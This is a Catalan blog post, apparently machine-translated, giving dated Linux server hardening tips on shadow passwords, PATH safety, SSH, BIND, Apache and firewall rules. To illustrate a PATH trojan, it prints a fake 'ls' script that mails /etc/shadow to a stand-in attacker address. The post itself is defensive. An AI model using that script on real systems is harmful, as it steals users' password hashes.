Consells de seguretat per al teu Linux (Servidor) (Part 1)

Fa molt temps no públic res al blog i m'agradaria compartir-alguns consells extrets d'un llibre que, (Entre d'altres). Vaig trobar a la Universitat i acabo de llegir i encara que sincerament aquesta una mica obsolet i les tècniques mostrades són molt poc probables que funcionin donada l'evolució de sistema, de la mateixa manera són aspectes interessants que es poden mostrar. 9788448140502

Vull aclarir que són consells orientats a un sistema Linux que sigui usat com a servidor, a mitjana o potser gran escala atès que a nivell d'usuari d'escriptori, encara que poden aplicar-se, no serien molt útils.

També adverteixo que són simples consells ràpids i no entraré molt en el detall, tot i que tinc pensat fer un altre post molt més específic i extens sobre un tema en particular. Però això ho veuré després. Comencem.

Polítiques de contrasenya. 

Encara que soni a frase de calaix, tenir una bona política de contrasenyes fa la diferència entre un sistema vulnerable o no. Atacs com «força bruta» s'aprofiten de tenir una mala contrasenya per accedir a un sistema. Els tips mes comuns són:

  • Combinar majúscules i minúscules.
  • Utilitza caràcters especials.
  • Números.
  • Mas de 6 dígits (tant de bo mes de 8).

A més d'això, tinguem en compte dos arxius essencials.  / Etc / passwd i / etc / shadow.

Una cosa molt important és que l'arxiu / Etc / passwd. a més de donar-nos el nom de l'usuari, el seu uid, carpeta path, bash .. etc. en alguns casos també mostra la clau encriptada de l'usuari.

 Mirem la seva composició típica.

desdelinux:FXWUuZ.vwXttg:500:501::/home/usuario1:/bin/bash

usuari: clavecrypt: uid: gid: path :: path: bash

El problema real aquí, és que aquest arxiu en particular té permisos -RW-r-r- el que significa que té permisos de lectura per qualsevol usuari d'sistema. i tenint la clau encriptada no és molt difícil desxifrar la real.

Per això existeix el fitxer / Etc / shadow. Aquest és l'arxiu on s'emmagatzemen totes les claus dels usuaris, entre d'altres coses. Aquest fitxer té els permisos necessaris perquè cap usuari pugui llegir-lo.

Per arreglar això llavors, hem d'anar a l'arxiu / etc / passwd i canviar la clau encriptada per una «x», això farà que la clau només sigui guardada en el nostre arxiu / Etc / shadow.

desdelinux:x:500:501::/home/usuario1:/bin/bash

Problemes amb el PATH i .bashrc i altres.

Quan un usuari executa una ordre en la seva consola, l'intèrpret d'ordres busca dit comandament en una llista de directoris que conté la variable d'entorn PATH.

Si escrius «echo $ PATH» en la consola sortirà alguna cosa com això.

.:/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games:/home/carlos/bin

Cadascuna d'aquestes carpetes és on la shell busqués la comanda escrit per executar-lo. El «.» vol dir que la primera carpeta a buscar és la carpeta mateixa des d'on s'executa l'ordre.

Suposeu vostè que hi ha un usuari «carlos» i aquest usuari vol «fer maldats». Aquest usuari podria deixar un arxiu anomenat «ls» a la seva carpeta principal, i en aquest arxiu executar una ordre com:

#!/bin/bash
cat /etc/shadow | mail hacker@mail.com
/bin/ls

I si l'usuari root per coses de la destinació, intenta llistar les carpetes dins de la carpeta de carlos (com primer busca la comanda en aquesta mateixa carpeta, sense adonar-se'n estaria enviant l'arxiu amb les contrasenyes a aquest correu i després es llistaria les carpeta i no s'adonaria fins molt tard.

Per evitar això hem d'eliminar el «.» de la variable PATH.

D'aquesta mateixa manera s'han d'auditar arxius com /.bashrc, /.bashrc_profile, ./.login i revisar que no hi hagi «.» en la variable PATH, i de fet des d'arxius com aquest, es poden canviar el destí d'algun comanda especifica.

Consells amb serveis:

SHH

  • Deshabilitar la versió 1 de l'protocol ssh al arcvhio sshd_config.
  • No permetre que l'usuari root pugui loggear per ssh.
  • Els arxius i carpetes ssh_host_key, ssh_host_dsa_key i ssh_host_rsa_key només s'han de llegir per l'usuari root.

BIND

  • Canviar el missatge de benvinguda a l'arxiu named.conf pota que no mostri el nombre de versió
  • Limitar la transferències de zones, i només habilitar-la per als equips que ho necessitin.

Apache

  • Eviteu que el servei mostri la seva versió en el missatge de benvinguda. Editeu el fitxer httpd.conf i afegiu o modifiqui les línies:  

ServerSignature Off
ServerTokens Prod

  • Desactivar indexació automàtica
  • Configureu apatxe perquè no serveixi arxius sensibles com .htacces, * .inc, * .jsp .. etc
  • Eliminar pàgina man o exemple de el servei
  • Executar apatxe en un entorn acotat «chroot»

Seguretat de Xarxa.

És indispensable cobrir totes les possibles entrades al seu sistema des de la xarxa externa, a continuació alguns consells indispensables per evitar que intrusos escanejar i obtinguin informació de la seva xarxa.

Bloquejar trànsit ICMP

S'ha de configurar el tallafocs perquè bloquegi tot tipus de trànsit i respostes d'eco entrants i sortints tipus ICMP. Amb això t'evites que, per exemple, un scanner que aquest buscant equips vius en un rang de ip et localitzi. 

Evitar escaneig de ping TCP.

Una manera de scanear teu sistema és l'escaneig de ping TCP. Suposeu que en el seu servidor ha un servidor Apache al port 80. L'intrús podria enviar una petició ACK a aquest port, amb això, si el sistema respon es dara fet que l'equip està viu i escanejarà la resta de ports.

Per això el seu tallafocs hauria de tenir sempre l'opció «coneixement d'estat» i hauria de descartar tots els paquets ACK que no corresponguin a una connexió o sessió TCP ja establerta.

Alguns consells addicionals:

  • Utilitza sistemes IDS per detectar escanejats de ports a la seva xarxa.
  • Configura Firewall perquè no vaig confiar en els valors de port d'origen de la connexió.

Això és atès que alguns scaneos utilitzen un port «fals» origen tal com el 20 o 53, atès que molts sistemes confien en aquests ports per ser els típics d'un ftp o un DNS.

NOTA: Recordeu que la majoria de problemes indicats en aquest post ja han estat solucionats en la gairebé totes les distribucions actuals. Però mai està de més tenir informació clau d'aquests inconvenients perquè no et passin.

NOTA: Posteriorment veuré algun tema en específic i faré un post amb molta mes informació detallada i més actual.

Gràcies a tots per llegir.

Salutacions.


El contingut d'l'article s'adhereix als nostres principis de ètica editorial. Per notificar un error punxa aquí.

Un comentari, deixa el teu

Deixa el teu comentari

La seva adreça de correu electrònic no es publicarà.

*

*

  1. Responsable de les dades: Miguel Ángel Gatón
  2. Finalitat de les dades: Controlar l'SPAM, gestió de comentaris.
  3. Legitimació: El teu consentiment
  4. Comunicació de les dades: No es comunicaran les dades a tercers excepte per obligació legal.
  5. Emmagatzematge de les dades: Base de dades allotjada en Occentus Networks (UE)
  6. Drets: En qualsevol moment pots limitar, recuperar i esborrar la teva informació.

  1.   informàtic va dir

    M'ha agradat molt l'article i estic interessat en el tema, t'animo a seguir pujant continguts.